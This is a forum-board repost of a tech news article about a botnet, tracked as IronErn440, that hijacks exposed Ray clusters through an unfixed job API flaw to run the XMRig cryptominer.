Subj : Ray clusters hijacked and
To   : All
From : Mike Powell
Date : Thu Nov 20 2025 08:26 am

Ray clusters hijacked and turned into crypto miners by shadowy new botnet

Date:
Wed, 19 Nov 2025 15:21:00 +0000

Description:
IronErn440 is using a known, unfixed flaw, to create a botnet and deploy the
XMRig cryptojacker.

FULL STORY

Ray clusters, still vulnerable to a critical severity flaw discovered years
ago, are being used for cryptocurrency mining, data exfiltration, and even
Distributed Denial of Service ( DDoS ) attacks, experts have warned.

Cybersecurity researchers Oligo claim this is the second major campaign to
leverage this same flaw.

Ray is an open source network that helps run Python programs faster by
decentralizing and distributing the work across multiple machines. Its
clusters are groups of computers - one head node and multiple worker nodes -
that work together to run Ray tasks and workloads in a distributed and
coordinated way.

Back in 2023, it was discovered that Ray 2.6.3 and 2.8.0 carried a
vulnerability that allowed a remote attacker to execute arbitrary code via
the job submission API. However Anyscale, the company behind the product, did
not fix it since it is designed to run in a strictly-controlled network
environment.

In other words - its up to the users to secure their infrastructure and make
sure the flaw does not get abused.

But abused, it was. First, between September 2023 and March 2024, and today.
Oligo says that threat actors tracked as IronErn440 are now using
AI-generated payloads to infiltrate vulnerable clusters. By leveraging the
bug, the attackers submit jobs to unauthenticated Jobs API, running
multi-stage Bash and Python payloads hosted on GitHub and GitLab.

These payloads deploy malware to the devices - usually the infamous XMRig
cryptojacker. While this cryptojacker is usually easily spotted (since it
takes up 100% of the devices processing power and renders it useless for
pretty much anything else), the attackers tried to work around this issue by
locking it to 60% of processing power.

Today, there are more than 230,000 Ray servers exposed to the internet, the
researchers warned, saying that their numbers grew significantly compared to
just a few thousand that were available when the vulnerability was first
discovered.

Via BleepingComputer

======================================================================
Link to news story:
https://www.techradar.com/pro/security/ray-clusters-hijacked-and-turned-into-c
rypto-miners-by-shadowy-new-botnet

$$
--- SBBSecho 3.28-Linux
* Origin: capitolcityonline.net * Telnet/SSH:2022/HTTP (1:2320/105)

You are viewing proxied material from cvs.synchro.net. The copyright of proxied material belongs to its original authors. Any comments or complaints in relation to proxied material should be directed to the original authors of the content concerned. Please see the disclaimer for more details.